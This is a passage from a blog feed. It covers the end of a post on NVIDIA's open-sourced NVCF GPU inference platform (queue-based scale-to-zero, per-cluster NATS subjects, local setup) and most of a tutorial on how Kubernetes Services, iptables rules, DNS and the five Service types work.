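// Invoke buffers a request whether or not any worker is running.
func (p *Platform) Invoke(req string) {
    p.queue = append(p.queue, req)
}

// AutoscaleTick scales up from zero when there is queued work.
func (p *Platform) AutoscaleTick() {
    if len(p.queue) == 0 || p.desired != 0 {
        return
    }
    p.desired = 1
}

// WorkerPull returns the buffered requests once a worker exists.
func (p *Platform) WorkerPull() []string {
    if p.desired == 0 {
        return nil // no pod yet, requests stay buffered
    }
    pulled := p.queue
    p.queue = nil
    return pulled
}

func main() {
    var p Platform
    p.Invoke("req-1")                // arrives at zero instances
    fmt.Println(len(p.WorkerPull())) // nothing is running yet
    p.AutoscaleTick()                // queue depth is non-zero, scale up
    fmt.Println(p.WorkerPull())      // the buffered request is delivered
}
</code></pre>
<p>The point of the model: the request sits in the queue across the scale-up, so nothing depends on a pod already being there when the call arrives.</p>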
<table>
<thead>
<tr>
<th></th>
<th>NATS JetStream</th>
<th>Knative</th>
</tr>
</thead>
<tbody><tr>
<td>Requests during scale-up</td>
<td>Buffered, zero dropped</td>
<td>Buffered by the activator, but may time out on long cold starts</td>
</tr>
<tr>
<td>Cold start behavior</td>
<td>Queue buffers, pod starts</td>
<td>Requests may face timeout or retry pressure during long cold starts</td>
</tr>
<tr>
<td>Multi-cluster routing</td>
<td>Per-cluster durable consumers</td>
<td>Single cluster only</td>
</tr>
<tr>
<td>Operational footprint</td>
<td>Purpose-built GPU inference platform</td>
<td>Requires full Knative stack</td>
</tr>
</tbody></table>
<hr />
<h2>Multi-Cluster by Design</h2>
<p>Each GPU cluster runs its own NVCA. NATS JetStream subjects are scoped per cluster:</p>
<pre><code class="language-plaintext">Creation:     Create.NVCA.*.{clusterID}.*.*
Termination:  Terminate.NVCA.{clusterID}
Consumer:     {streamName}-{clusterID}  (durable, per cluster)
</code></pre>
<p>A single control plane can manage GPU clusters across on-prem H100s, cloud H200s, GB200 NVLink nodes, and cloud provider partners simultaneously. The invocation plane routes based on the function deployment specification.</p>
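<p>Per-cluster scoping comes down to string patterns. A hedged Go sketch: the helper names are hypothetical, the concrete tokens in the example subject are placeholders (the post does not say what each <code>*</code> position holds), and <code>matches</code> only implements the single-token <code>*</code> wildcard from NATS subject rules.</p>
<pre><code class="language-go">package main

import (
    "fmt"
    "strings"
)

// createFilter builds the per-cluster creation filter shown above.
func createFilter(clusterID string) string {
    return fmt.Sprintf("Create.NVCA.*.%s.*.*", clusterID)
}

// terminateSubject builds the per-cluster termination subject.
func terminateSubject(clusterID string) string {
    return "Terminate.NVCA." + clusterID
}

// consumerName builds the durable consumer name for one cluster.
func consumerName(streamName, clusterID string) string {
    return streamName + "-" + clusterID
}

// matches reports whether subject fits filter, where "*" matches exactly
// one dot-separated token. The multi-token wildcard is not handled.
func matches(filter, subject string) bool {
    f := strings.Split(filter, ".")
    s := strings.Split(subject, ".")
    if len(f) != len(s) {
        return false
    }
    for i, tok := range f {
        if tok == "*" {
            continue
        }
        if tok != s[i] {
            return false
        }
    }
    return true
}

func main() {
    filter := createFilter("cluster-a")
    // "x", "y", "z" are placeholder tokens, not real NVCF values.
    fmt.Println(matches(filter, "Create.NVCA.x.cluster-a.y.z"))
    fmt.Println(matches(filter, "Create.NVCA.x.cluster-b.y.z"))
    fmt.Println(terminateSubject("cluster-a"), consumerName("nvca", "cluster-a"))
}
</code></pre>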
<hr />
<h2>Setting Up Locally (What Works Without NGC Access)</h2>
<p>You can bootstrap the cluster and fake GPU layer without NGC credentials. The NVCF services deployment is what requires the <code>nvcf-onprem</code> org access.</p>
<pre><code class="language-bash"># Clone the repo
git clone https://github.com/nvidia/nvcf
cd nvcf/examples/self-hosted-local-development

# Bootstrap k3d cluster (6 nodes) + KWOK + fake GPU operator
# This works fully without NGC
./setup.sh

# Verify fake H100 nodes are registered
kubectl get nodes -l run.ai/simulated-gpu-node-pool=default
# NAME               STATUS   ROLES    GPU
# k3d-nvcf-agent-3   Ready    &lt;none&gt;   8x NVIDIA-H100-80GB-HBM3
# k3d-nvcf-agent-4   Ready    &lt;none&gt;   8x NVIDIA-H100-80GB-HBM3

# Deploy NVCF stack (requires NGC nvcf-onprem access)
helm registry login nvcr.io -u '$oauthtoken' -p "${NGC_API_KEY}"
HELMFILE_ENV=local helmfile sync
</code></pre>
<p>The fake GPU operator from <a href="https://github.com/run-ai/fake-gpu-operator">run-ai/fake-gpu-operator</a> adds <code>nvidia.com/gpu</code> extended resources to real Kubernetes nodes. Pods schedule and run. CUDA calls fail since there is no real GPU, but all NVCF orchestration, NATS dispatch, and scale-to-zero logic works exactly as in production.</p>
<hr />
<h2>How NVCF Compares</h2>
<table>
<thead>
<tr>
<th>Category</th>
<th>NVCF</th>
<th>KubeRay</th>
<th>KServe</th>
<th>Knative Serving</th>
</tr>
</thead>
<tbody><tr>
<td>Primary workload</td>
<td>Long-running GPU inference</td>
<td>Ray/Python distributed workloads</td>
<td>Multi-framework ML serving</td>
<td>Stateless HTTP services</td>
</tr>
<tr>
<td>Scale-to-zero</td>
<td>Durable NATS buffering</td>
<td>Ray autoscaling</td>
<td>Typically relies on Knative-style autoscaling</td>
<td>Request buffering with timeout/retry pressure during long cold starts</td>
</tr>
<tr>
<td>Multi-cluster</td>
<td>Built-in</td>
<td>Primarily single cluster</td>
<td>Primarily single cluster</td>
<td>No native multi-cluster orchestration</td>
</tr>
<tr>
<td>Function abstraction</td>
<td>Helm function type</td>
<td>No native function abstraction</td>
<td>No native function abstraction</td>
<td>No native function abstraction</td>
</tr>
<tr>
<td>GPU orchestration</td>
<td>KAI Scheduler + DRA integration</td>
<td>Standard Kubernetes scheduling</td>
<td>Standard Kubernetes scheduling</td>
<td>Standard Kubernetes scheduling</td>
</tr>
</tbody></table>
<p>KubeRay and NVCF are not competitors. You should be able to run Ray Serve under KubeRay as an NVCF function.</p>
<hr />
<h2>What the Open Source Release Actually Changes</h2>
<p><strong>Inspectability.</strong> Enterprises can now validate NVIDIA’s architectural decisions directly from the source code instead of treating the platform as a black box.</p>
<p><strong>Customization.</strong> You can modify the autoscaler Rust loop, add NATS auth strategies, extend the MiniService controller, or build new CLI commands. Earlier, these internals were largely inaccessible outside NVIDIA-managed environments.</p>
<hr />
<h2>Links</h2>
<ul>
<li><p>Repo: <a href="https://github.com/nvidia/nvcf">github.com/nvidia/nvcf</a></p>
</li>
<li><p>Docs: <a href="https://docs.nvidia.com/nvcf/overview">docs.nvidia.com/nvcf/overview</a></p>
</li>
<li><p>My PR: <a href="https://github.com/NVIDIA/nvcf/pull/13">NVIDIA/nvcf#13</a></p>
</li>
<li><p>NGC access issue: <a href="https://github.com/NVIDIA/nvcf/issues/14">NVIDIA/nvcf#14</a></p>
</li>
<li><p>Contribute / contact team: <a href="mailto:nvcf-interest@nvidia.com">nvcf-interest@nvidia.com</a></p>
</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[How a Kubernetes Service Actually Works (and All 5 Types You Need)]]></title><description><![CDATA[A pod gets created. It gets an IP. Then it dies. A new pod replaces it. New IP. Now imagine you have ten pods of the same app, and they restart all the time. Which IP do you call?
You can't. That's the problem Services solve, and the answer is more i...]]></description><link>https://blog.kubesimplify.com/how-a-kubernetes-service-actually-works-and-all-5-types-you-need</link><guid isPermaLink="true">https://blog.kubesimplify.com/how-a-kubernetes-service-actually-works-and-all-5-types-you-need</guid><category><![CDATA[cloud native]]></category><category><![CDATA[Devops]]></category><category><![CDATA[Kubernetes]]></category><category><![CDATA[networking]]></category><category><![CDATA[service]]></category><dc:creator><![CDATA[Saiyam Pathak]]></dc:creator><pubDate>Tue, 05 May 2026 06:55:18 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1777964077380/f831367f-3bec-4384-bfd0-672eebd4ba65.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>A pod gets created. It gets an IP. Then it dies. A new pod replaces it. New IP. Now imagine you have ten pods of the same app, and they restart all the time. <strong>Which IP do you call?</strong></p>
<p>You can't. That's the problem Services solve, and the answer is more interesting than "Kubernetes assigns a stable IP."</p>
<p>This post walks the full picture in five parts: why Services have to exist, what happens when you create one, what happens when traffic actually calls one, all five Service types (most posts stop at three), and a real cluster demo at the bottom. Every claim is verified against <code>kubernetes/kubernetes</code> 1.36 source.</p>
<div class="embed-wrapper"><div class="embed-loading"><div class="loadingRow"></div><div class="loadingRow"></div></div><a class="embed-card" href="https://youtu.be/uP4Gc08qeXM">https://youtu.be/uP4Gc08qeXM</a></div>
<h2 id="heading-tldr">TL;DR</h2>
<ol>
<li><strong>Why Services exist.</strong> Pods are ephemeral; their IPs change on every restart and reschedule. A Service is a stable identity for an unstable set of pods.</li>
<li><strong>Creation flow.</strong> <code>kubectl expose</code> → API server allocates a ClusterIP from <code>--service-cluster-ip-range</code> (since 1.33, backed by <code>IPAddress</code> objects, GA) → EndpointSlice controller fills the slice with matching pod IPs → kube-proxy on every node programs iptables → CoreDNS adds the name. Sub-second end to end.</li>
<li><strong>Request flow.</strong> <code>curl my-service</code> → CoreDNS returns ClusterIP → packet hits <code>KUBE-SERVICES</code> → matches <code>KUBE-SVC-XXX</code> → <code>--mode random</code> picks one rule → <code>KUBE-SEP-YYY</code> does DNAT to a pod IP → kernel routes to the backend → conntrack rewrites the source IP back to ClusterIP on the reply.</li>
<li><strong>Five Service types.</strong> ClusterIP (internal), NodePort (every-node port, dev/test), LoadBalancer (cloud-provided external LB for prod), ExternalName (DNS CNAME alias for managed services), Headless (<code>clusterIP: None</code>, DNS returns pod IPs directly — for StatefulSets).</li>
<li><strong>The dataplane is the kernel.</strong> Three controllers cooperate to write iptables rules, but the actual packet forwarding is pure Linux netfilter. The Service object is metadata; the kernel does the work.</li>
</ol>
<h2 id="heading-part-1-why-services-exist">Part 1: Why Services exist</h2>
<p>The Kubernetes pod model is deliberately ephemeral. Pods get rescheduled, restarted, scaled up and down. <strong>Pod IPs change every time</strong>. There is no permanent address.</p>
<p>This is by design. Kubernetes treats pods as cattle, not pets. The system is at its best when no individual pod is precious and the whole workload can be reshuffled across the cluster. But applications need to talk to each other, and applications need a stable target.</p>
<p>A Service is the answer. It is a stable identity for an unstable set of pods. You give it a label selector (<code>app: nginx</code>). Any pod that matches the selector becomes a backend. The Service exposes one virtual IP, called the ClusterIP. Pods come and go. The ClusterIP stays.</p>
<p>Without this abstraction, you would be writing service discovery code from scratch in every application, forever. Every microservice architecture in Kubernetes depends on this idea. It is so fundamental that it is easy to miss how clever it is.</p>
<h2 id="heading-part-2-what-happens-when-you-create-a-service">Part 2: What happens when you create a Service</h2>
<p>One command:</p>
<pre><code class="lang-bash">$ kubectl expose deployment nginx --port=80
service/nginx exposed
</code></pre>
<p>Behind that one line, an entire pipeline of controllers wakes up.</p>
<h3 id="heading-step-1-the-api-server-allocates-a-clusterip">Step 1: The API server allocates a ClusterIP</h3>
<p>The API server receives the create request, runs admission, runs validation. Then it allocates a ClusterIP from the configured <code>--service-cluster-ip-range</code> (typically <code>10.96.0.0/12</code>).</p>
<p>Since Kubernetes 1.33, the IP allocator is backed by first-class <code>IPAddress</code> and <code>ServiceCIDR</code> objects. You can run:</p>
<pre><code class="lang-bash">$ kubectl get ipaddresses
NAME           PARENTREF
10.96.255.20   services/default/my-service
</code></pre>
<p>This used to be a bitmap stored in etcd. Now it's a clean API. The Service object gets the allocated IP stamped onto <code>spec.clusterIP</code>, the write goes to etcd via Raft, and the Service exists. <strong>At this point, no pod is connected to it yet.</strong> The Service is just metadata.</p>
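<p>A quick way to sanity-check an allocation is to test the ClusterIP against the configured range. The sketch below uses Python's standard <code>ipaddress</code> module with the example values from this section; <code>in_service_range</code> is a hypothetical helper name, and your cluster's range may differ.</p>

```python
import ipaddress

# Example values from this post; substitute your own --service-cluster-ip-range.
SERVICE_CIDR = ipaddress.ip_network("10.96.0.0/12")


def in_service_range(ip, cidr=SERVICE_CIDR):
    """Return True if the given IP string falls inside the Service CIDR."""
    return ipaddress.ip_address(ip) in cidr


if __name__ == "__main__":
    print(in_service_range("10.96.255.20"))  # the ClusterIP from the example
    print(in_service_range("10.244.1.42"))   # a pod IP, outside the range
    print(SERVICE_CIDR.num_addresses)        # total addresses in a /12
```

<p>A /12 holds 2^20 addresses, which is why ClusterIP exhaustion is rare on default settings.</p>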
<h3 id="heading-step-2-the-endpointslice-controller-fills-the-slice">Step 2: The EndpointSlice controller fills the slice</h3>
<p>The EndpointSlice controller runs inside <code>kube-controller-manager</code>. It has two informers: one watches Services, one watches Pods. When a new Service appears, the controller scans every pod in the namespace. For each pod that matches the selector and has an IP, it builds a slice entry: pod IP, pod node, ports, conditions. The <code>ready</code> condition records whether the pod is <code>Ready</code>, and kube-proxy normally routes only to endpoints that are.</p>
<p>The output is one or more <code>EndpointSlice</code> objects, capped at 100 endpoints each by default. A Service with three pods has one slice. A Service with three thousand pods has at least thirty.</p>
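<p>The slice arithmetic is a ceiling division. A minimal sketch, assuming the default cap of 100 (<code>min_slices</code> is a hypothetical helper, not part of any Kubernetes client):</p>

```python
import math

MAX_ENDPOINTS_PER_SLICE = 100  # default cap described above


def min_slices(endpoints, cap=MAX_ENDPOINTS_PER_SLICE):
    """Fewest EndpointSlices that can hold the given number of endpoints."""
    return math.ceil(endpoints / cap)


if __name__ == "__main__":
    for count in (3, 101, 3000):
        print(count, "endpoints ->", min_slices(count), "slice(s) minimum")
```

<p>This is a lower bound. The controller does not always pack slices perfectly, so a live cluster can show more slices than this number.</p>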
<p>Each slice has an <code>ownerReference</code> to the Service (so deletion cascades) and labels:</p>
<ul>
<li><code>kubernetes.io/service-name: my-service</code></li>
<li><code>endpointslice.kubernetes.io/managed-by: endpointslice-controller.k8s.io</code></li>
</ul>
<p>That's how kube-proxy knows which Service a slice belongs to.</p>
<blockquote>
<p>Side note worth knowing: the legacy <code>Endpoints</code> API was officially deprecated in 1.33 (KEP-4974). It still works for older controllers, but <code>EndpointSlices</code> are the source of truth now.</p>
</blockquote>
<h3 id="heading-step-3-kube-proxy-on-every-node-reprograms">Step 3: kube-proxy on every node reprograms</h3>
<p>There is a kube-proxy pod on every node, deployed as a DaemonSet in nearly every installer. It has Service and EndpointSlice informers. When a slice changes, kube-proxy works out which Services and endpoints are affected, then batches the updated chains into a single <code>iptables-restore</code> call. The kernel applies that batch as one transaction.</p>
<p>Three nodes, three independent reprograms, all in parallel. Total time on a normal cluster: milliseconds.</p>
<h3 id="heading-step-4-what-gets-programmed">Step 4: What gets programmed</h3>
<p>The actual rules look like this (real captured output from a kind 1.35.1 cluster, slightly trimmed):</p>
<pre><code>-A KUBE-SERVICES -d <span class="hljs-number">10.96</span><span class="hljs-number">.255</span><span class="hljs-number">.20</span>/<span class="hljs-number">32</span> -p tcp --dport <span class="hljs-number">80</span> -j KUBE-SVC-FXIYY
-A KUBE-SVC-FXIYY -m statistic --mode random --probability <span class="hljs-number">0.333</span> -j KUBE-SEP<span class="hljs-number">-1</span>
-A KUBE-SVC-FXIYY -m statistic --mode random --probability <span class="hljs-number">0.500</span> -j KUBE-SEP<span class="hljs-number">-2</span>
-A KUBE-SVC-FXIYY -j KUBE-SEP<span class="hljs-number">-3</span>
-A KUBE-SEP<span class="hljs-number">-1</span> -j DNAT --to-destination <span class="hljs-number">10.244</span><span class="hljs-number">.1</span><span class="hljs-number">.42</span>:<span class="hljs-number">80</span>
-A KUBE-SEP<span class="hljs-number">-2</span> -j DNAT --to-destination <span class="hljs-number">10.244</span><span class="hljs-number">.2</span><span class="hljs-number">.18</span>:<span class="hljs-number">80</span>
-A KUBE-SEP<span class="hljs-number">-3</span> -j DNAT --to-destination <span class="hljs-number">10.244</span><span class="hljs-number">.3</span><span class="hljs-number">.7</span>:<span class="hljs-number">80</span>
</code></pre><p><code>KUBE-SERVICES</code> is the entry chain. Every Service port has a match rule that jumps to a per-Service chain, named <code>KUBE-SVC-</code> plus a hash of the Service's namespace, name, port name, and protocol. That chain has one rule per backend, with declining <code>--mode random --probability</code> values: <code>1/n</code> for the first rule, <code>1/(n-1)</code> for the second, and so on, ending in an unconditional rule. Each backend rule jumps to a per-endpoint <code>KUBE-SEP-</code> chain that does the actual DNAT.</p>
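<p>To see how the per-Service chain grows with the number of backends, here is a small sketch that builds rules in the same shape as the trimmed output above. It is an illustration only, not kube-proxy's code; <code>service_rules</code> and the shortened chain names are hypothetical.</p>

```python
def service_rules(svc_chain, endpoints):
    """Build iptables-style rules for one Service.

    endpoints is a list of (sep_chain, "ip:port") pairs. Every backend
    except the last gets a statistic rule with probability 1/remaining;
    the last backend gets an unconditional jump.
    """
    rules = []
    total = len(endpoints)
    for index, (sep_chain, _dest) in enumerate(endpoints):
        remaining = total - index
        if remaining > 1:
            rules.append(
                f"-A {svc_chain} -m statistic --mode random "
                f"--probability {1 / remaining:.3f} -j {sep_chain}"
            )
        else:
            rules.append(f"-A {svc_chain} -j {sep_chain}")
    for sep_chain, dest in endpoints:
        rules.append(f"-A {sep_chain} -j DNAT --to-destination {dest}")
    return rules


if __name__ == "__main__":
    backends = [
        ("KUBE-SEP-1", "10.244.1.42:80"),
        ("KUBE-SEP-2", "10.244.2.18:80"),
        ("KUBE-SEP-3", "10.244.3.7:80"),
    ]
    for rule in service_rules("KUBE-SVC-FXIYY", backends):
        print(rule)
```

<p>With <code>n</code> backends the chain always has <code>n - 1</code> statistic rules plus one fallthrough, which is why lookup cost in iptables mode grows linearly with the backend count.</p>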
<p>iptables is the default mode. nftables (GA in 1.33) uses <code>verdict maps</code> for a constant-time hash lookup instead of the linear scan, and is recommended for modern Linux clusters. IPVS mode was deprecated in 1.35 and is now legacy.</p>
<h3 id="heading-step-5-coredns-adds-the-name">Step 5: CoreDNS adds the name</h3>
<p>There's a Service called <code>kube-dns</code> in the <code>kube-system</code> namespace, backed by CoreDNS pods. Every pod's <code>/etc/resolv.conf</code> has the kube-dns ClusterIP as its nameserver. CoreDNS has a <code>kubernetes</code> plugin that watches Services. When <code>my-service</code> appears, CoreDNS now resolves <code>my-service.default.svc.cluster.local</code> to the ClusterIP.</p>
<p>Three controllers cooperated, plus DNS, and the Service is live. Total time from <code>kubectl expose</code> to first traffic flowing: under a second.</p>
<h2 id="heading-part-3-what-happens-when-traffic-calls-a-service">Part 3: What happens when traffic calls a Service</h2>
<p><code>kubectl exec</code> into a busybox pod, run <code>curl my-service</code>. Two seconds later: <code>&lt;title&gt;Welcome to nginx!&lt;/title&gt;</code>. Now slow that down to seven steps.</p>
<h3 id="heading-step-1-dns-resolution">Step 1: DNS resolution</h3>
<p>The pod sees <code>curl my-service</code>, but <code>my-service</code> is not a real hostname. The pod's resolver consults its search list (<code>default.svc.cluster.local</code>, <code>svc.cluster.local</code>, <code>cluster.local</code>). It tries <code>my-service.default.svc.cluster.local</code> first. The query goes to CoreDNS, which has the kubernetes plugin watching Services, and returns the ClusterIP.</p>
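<p>The search-list expansion can be sketched in a few lines. This assumes the pod's <code>resolv.conf</code> carries <code>options ndots:5</code>, which is what Kubernetes writes for the default DNS policy but is not shown in this post; <code>candidate_names</code> is a hypothetical helper that mimics the resolver's ordering and performs no real DNS queries.</p>

```python
def candidate_names(name, namespace="default",
                    cluster_domain="cluster.local", ndots=5):
    """Return the fully qualified names a resolver would try, in order."""
    if name.endswith("."):
        # A trailing dot means the name is already fully qualified.
        return [name]
    search = [
        f"{namespace}.svc.{cluster_domain}",
        f"svc.{cluster_domain}",
        cluster_domain,
    ]
    expanded = [f"{name}.{suffix}." for suffix in search]
    absolute = f"{name}."
    if name.count(".") < ndots:
        # Few dots: walk the search list first, try the bare name last.
        return expanded + [absolute]
    # Enough dots: try the name as given first, then the search list.
    return [absolute] + expanded


if __name__ == "__main__":
    for candidate in candidate_names("my-service"):
        print(candidate)
```

<p>For <code>my-service</code> the first candidate already matches, so CoreDNS answers on the first query. External names with few dots pay for the extra lookups, which is one reason some teams write external hostnames with a trailing dot.</p>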
<h3 id="heading-step-2-tcp-packet-to-clusterip">Step 2: TCP packet to ClusterIP</h3>
<p>The pod opens a TCP connection. SYN packet, destination ClusterIP, port 80. The packet leaves the pod's <code>veth</code> pair, enters the host's network namespace. PREROUTING.</p>
<h3 id="heading-step-3-kube-services-matches">Step 3: KUBE-SERVICES matches</h3>
<p>The packet hits the <code>KUBE-SERVICES</code> chain. Every Service port has a match rule here. The rule says: destination is <code>10.96.255.20</code>, port <code>80</code>? Jump to <code>KUBE-SVC-FXIYY</code>. Now the packet is inside the per-Service chain.</p>
<h3 id="heading-step-4-mode-random-picks-one">Step 4: --mode random picks one</h3>
<p><code>KUBE-SVC-FXIYY</code> has one rule per backend, with the declining-probability pattern:</p>
<ul>
<li>Rule 1 fires with <code>probability 1/3</code> → <code>KUBE-SEP-1</code></li>
<li>Rule 2 fires with <code>probability 1/2</code> of what's left → <code>KUBE-SEP-2</code></li>
<li>Rule 3 is the unconditional fallthrough → <code>KUBE-SEP-3</code></li>
</ul>
<p>The math works out: each backend gets one third of new connections on average (1/3, then 2/3 × 1/2 = 1/3, then the remaining 1/3). iptables <code>-m statistic --mode random</code> is the underlying mechanism.</p>
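<p>The same result holds for any number of backends. The sketch below computes each backend's exact share with rational arithmetic, assuming rule <code>i</code> (counting from zero) fires with probability <code>1/(n - i)</code> on whatever traffic reaches it; <code>backend_shares</code> is a hypothetical helper.</p>

```python
from fractions import Fraction


def backend_shares(n):
    """Exact share of new connections each of n backends receives."""
    shares = []
    remaining = Fraction(1)  # fraction of traffic that reaches this rule
    for index in range(n):
        probability = Fraction(1, n - index)  # last rule is 1/1
        shares.append(remaining * probability)
        remaining *= 1 - probability
    return shares


if __name__ == "__main__":
    print(backend_shares(3))
    print(backend_shares(10))
```

<p>Every entry comes out as <code>1/n</code>, so the declining probabilities are what make a sequential rule list behave like a uniform random pick.</p>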
<h3 id="heading-step-5-dnat-rewrites-the-destination">Step 5: DNAT rewrites the destination</h3>
<p>The chosen rule jumps to <code>KUBE-SEP-2</code>. That chain has one rule:</p>
<pre><code>-j DNAT --to-destination <span class="hljs-number">10.244</span><span class="hljs-number">.2</span><span class="hljs-number">.18</span>:<span class="hljs-number">80</span>
</code></pre><p>The kernel rewrites the destination of the packet from ClusterIP to the actual pod IP. The packet is no longer for the virtual address. It is now headed for a real pod, on a real node.</p>
<h3 id="heading-step-6-backend-receives">Step 6: Backend receives</h3>
<p>The packet routes to the backend pod's node, traverses the CNI bridge or overlay, arrives at the backend. The pod sees a normal TCP packet to its own IP, port 80. It sends back a SYN-ACK. <strong>The backend has no idea it was reached via a Service abstraction.</strong></p>
<h3 id="heading-step-7-reply-rewriting-via-conntrack">Step 7: Reply rewriting via conntrack</h3>
<p>The reply traffic is where the trick happens. Source IP is the backend pod. Destination is the original sender. But the Linux conntrack table remembers the DNAT we did on the way in. So when the reply comes back through the host, conntrack rewrites the source IP from the backend pod back to the ClusterIP.</p>
<p>The original sender pod sees the response coming from the ClusterIP, exactly the address it sent the packet to. Connection works. End to end. <strong>The pod has no idea this dance happened.</strong></p>
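<p>Steps 5 through 7 can be modelled with a toy lookup table. This is a deliberately simplified sketch of the idea, not the kernel's conntrack data structures; the class name, method names, and the client address <code>10.244.1.5:43512</code> are all hypothetical.</p>

```python
class ConntrackSketch:
    """Toy model of DNAT plus reply rewriting for a single host."""

    def __init__(self):
        # Maps the expected reply (backend, client) to the original destination.
        self._replies = {}

    def dnat(self, src, dst, backend):
        """Rewrite dst to the chosen backend and remember the mapping."""
        self._replies[(backend, src)] = dst
        return (src, backend)

    def rewrite_reply(self, src, dst):
        """Restore the original destination as the reply's source address."""
        original_dst = self._replies.get((src, dst))
        if original_dst is None:
            return (src, dst)  # not a tracked connection, leave untouched
        return (original_dst, dst)


if __name__ == "__main__":
    table = ConntrackSketch()
    client, cluster_ip, backend = "10.244.1.5:43512", "10.96.255.20:80", "10.244.2.18:80"
    print(table.dnat(client, cluster_ip, backend))   # request after DNAT
    print(table.rewrite_reply(backend, client))      # reply as the client sees it
```

<p>The key point is that the decision made for the first packet is stored once and reused, so every later packet of the connection reaches the same backend without re-running the random selection.</p>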
<h2 id="heading-part-4-all-five-service-types-with-real-use-cases">Part 4: All five Service types (with real use cases)</h2>
<p>Most "Service types" content stops at three. There are five, and each one solves a different problem.</p>
<h3 id="heading-1-clusterip">1. ClusterIP</h3>
<p>The default. Virtual IP, internal only. This is what we just walked through.</p>
<p><strong>Use case:</strong> application-to-application traffic inside the cluster. Frontend talks to backend. Microservice A calls microservice B. Both inside the cluster. By far the most common type.</p>
<h3 id="heading-2-nodeport">2. NodePort</h3>
<p>NodePort opens the same port on every node in the cluster, by default in the range <code>30000–32767</code>. Traffic to any node on that port gets forwarded to the ClusterIP, and from there to a pod.</p>
<p><strong>Use case:</strong> local development clusters like kind or minikube, where you don't have a cloud load balancer to provision. NodePort is also a building block — <code>LoadBalancer</code> Services use it under the hood.</p>
<h3 id="heading-3-loadbalancer">3. LoadBalancer</h3>
<p>This is what you use in production for public-facing apps. When you create a <code>LoadBalancer</code> Service on EKS, GKE, or AKS, the cloud provider integration provisions a real external load balancer and points it at the NodePort on each node. You get a public IP. Real users hit it.</p>
<p><strong>Use case:</strong> production-facing web apps. The browser-to-cluster ingress path.</p>
<h3 id="heading-4-externalname">4. ExternalName</h3>
<p>This is the type most people skip. <code>ExternalName</code> has no ClusterIP, no selector, no pods. It's a DNS CNAME alias inside the cluster.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Service</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">my-database</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">type:</span> <span class="hljs-string">ExternalName</span>
  <span class="hljs-attr">externalName:</span> <span class="hljs-string">prod-db.us-east-1.rds.amazonaws.com</span>
</code></pre>
<p>Now any pod can <code>curl my-database</code>, and the cluster DNS returns the AWS hostname.</p>
<p><strong>Use case:</strong> pointing in-cluster names at managed external services. Your apps look up <code>my-database</code>, the underlying address is a managed Postgres in RDS, and you can swap the target without changing application code. Same pattern works for managed Redis, S3-compatible stores, anything external.</p>
<h3 id="heading-5-headless">5. Headless</h3>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Service</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">cassandra-svc</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">clusterIP:</span> <span class="hljs-string">None</span>       <span class="hljs-comment"># ← the magic</span>
  <span class="hljs-attr">selector:</span>
    <span class="hljs-attr">app:</span> <span class="hljs-string">cassandra</span>
</code></pre>
<p>There is no virtual IP, no kube-proxy involvement, no DNAT. Instead, DNS returns the IPs of all backend pods directly. With a StatefulSet, each pod also gets a stable DNS name like <code>cassandra-0.cassandra-svc.default</code>.</p>
<p><strong>Use case:</strong> StatefulSets. Each pod gets a stable DNS name for peer discovery in distributed systems (Cassandra nodes finding each other, Kafka brokers, etcd peers). Custom client-side load balancing where the client wants to choose the backend itself, not have iptables choose. Anything that needs to talk to specific pods, not a load-balanced abstraction.</p>
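<p>Client-side load balancing against a Headless Service can be as simple as resolving the name and cycling through the answers. A minimal sketch, assuming it runs inside the cluster where <code>cassandra-svc</code> resolves; <code>resolve_all</code> and <code>round_robin</code> are hypothetical helpers, and port 9042 is only an example.</p>

```python
import itertools
import socket


def resolve_all(host, port, resolver=socket.getaddrinfo):
    """Return the sorted, de-duplicated IPs that DNS returns for host."""
    infos = resolver(host, port, type=socket.SOCK_STREAM)
    # Each entry is (family, type, proto, canonname, sockaddr).
    return sorted({sockaddr[0] for *_ignored, sockaddr in infos})


def round_robin(addresses):
    """Yield addresses in a repeating cycle, one per outgoing request."""
    return itertools.cycle(addresses)


if __name__ == "__main__":
    try:
        pods = resolve_all("cassandra-svc", 9042)
    except socket.gaierror:
        pods = []  # the name only resolves inside the cluster
    print(pods)
```

<p>Because the client holds the pod list itself, it should re-resolve periodically. Pod IPs behind a Headless Service change just as often as any other pod IPs.</p>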
<h3 id="heading-the-summary">The summary</h3>
<div class="hn-table">
<table>
<thead>
<tr>
<td>Type</td><td>Use case</td></tr>
</thead>
<tbody>
<tr>
<td>ClusterIP</td><td>Inside the cluster</td></tr>
<tr>
<td>NodePort</td><td>Dev clusters, building block</td></tr>
<tr>
<td>LoadBalancer</td><td>Public production traffic</td></tr>
<tr>
<td>ExternalName</td><td>Alias managed services</td></tr>
<tr>
<td>Headless</td><td>Stateful workloads</td></tr>
</tbody>
</table>
</div><p>Most teams over-use <code>LoadBalancer</code> when <code>ClusterIP</code> plus an Ingress would do. Pick the right one for the job.</p>
<h2 id="heading-part-5-live-demo">Part 5: Live demo</h2>
<p>To make all of this concrete, we ran the create-and-call flow on a real cluster (kind 1.35.1, three workers). What follows are verbatim outputs.</p>
<pre><code>$ kubectl get nodes
NAME                         STATUS   ROLES           AGE   VERSION
service-demo-control-plane   Ready    control-plane   <span class="hljs-number">24</span>s   v1<span class="hljs-number">.35</span><span class="hljs-number">.1</span>
service-demo-worker          Ready    &lt;none&gt;          <span class="hljs-number">14</span>s   v1<span class="hljs-number">.35</span><span class="hljs-number">.1</span>
service-demo-worker2         Ready    &lt;none&gt;          <span class="hljs-number">14</span>s   v1<span class="hljs-number">.35</span><span class="hljs-number">.1</span>
service-demo-worker3         Ready    &lt;none&gt;          <span class="hljs-number">14</span>s   v1<span class="hljs-number">.35</span><span class="hljs-number">.1</span>
</code></pre><p>Apply an nginx Deployment with three replicas, then a Service:</p>
<pre><code>$ kubectl apply -f nginx-deploy.yaml
deployment.apps/nginx created

$ kubectl get pods -o wide
NAME                    READY   STATUS    RESTARTS   AGE   IP           NODE
